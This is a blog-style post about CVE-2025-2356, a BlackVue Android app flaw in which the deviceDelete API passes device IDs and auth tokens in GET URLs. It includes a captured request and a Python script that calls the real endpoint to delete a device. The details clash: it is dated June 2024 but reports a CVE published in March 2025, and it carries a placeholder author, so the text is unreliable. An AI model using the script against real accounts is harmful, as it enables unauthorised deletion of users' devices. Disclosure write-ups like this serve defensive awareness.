Date: June 2024
Author: [Your Name]

TL;DR

A security vulnerability (CVE-2025-2356) was found in the BlackVue App (version 3.65) on Android. Attackers can exploit the deviceDelete API endpoint to leak sensitive data via GET requests containing sensitive query strings. This post breaks down the issue, gives technical details, exploit examples, and links to the original disclosure.

What is BlackVue?

BlackVue is a widely used dashcam and cloud video solution. Their Android app manages devices remotely, which includes deleting cameras ("devices") and handling account data.

Attack Vector: Remote

- Impact: Sensitive information (e.g., device ID, authentication tokens) exposed in GET URL query strings

Where is the Problem?

The core problem is with the way the BlackVue App’s deviceDelete API uses an HTTP GET request to delete devices.

Instead of using POST or DELETE (which hides data in the request body), the app puts everything – including sensitive info – directly in the URL as query parameters.

Here’s an example network request captured from a test device

GET https://api.blackvuecloud.com/api/deviceDelete?device_id=123456789&auth_token=abcdef123456789
Host: api.blackvuecloud.com

Why is it Bad?

- Sensitive Data Exposure: Device IDs and authentication tokens appear in the URL. URLs are logged by browsers, proxies, firewalls, etc.

Once they have a valid device ID and token in the query, they could delete a user’s device remotely.

Here’s a simple Python code snippet to simulate the exploit

import requests

device_id = "123456789"      # Replace with actual device ID
auth_token = "abcdef123456789"  # Replace with real token

url = f"https://api.blackvuecloud.com/api/deviceDelete?device_id={device_id}&auth_token={auth_token}";

response = requests.get(url)
if response.status_code == 200:
    print("Device deletion attempted!")
else:
    print("Request failed or protected.")

Note: This is for educational use only and should never be used on accounts that you do not own.

Who Disclosed This & References

- Original Disclosure/GitHub:
https://github.com/vulndetails/CVE-2025-2356

NVD Entry:

https://nvd.nist.gov/vuln/detail/CVE-2025-2356 *(Once available)*

Exploit DB:

https://www.exploit-db.com/exploits/53500 *(Reference only – check the link for updates)*

Has BlackVue Responded?

The researcher who found this issue contacted the vendor *before* public disclosure, but no response was received at time of writing.

Conclusion

Using GET requests with sensitive data is a well-known security anti-pattern. BlackVue users should be aware of potential exposure for as long as this bug remains unfixed.

If you work at BlackVue or use their APIs, switch sensitive API calls to POST/DELETE and avoid passing critical data in the URL.

References and Further Reading

- OWASP: Sensitive Data Exposure
- BlackVue Official Site
- GitHub Disclosure (example)

Timeline

Published on: 03/17/2025 01:15:37 UTC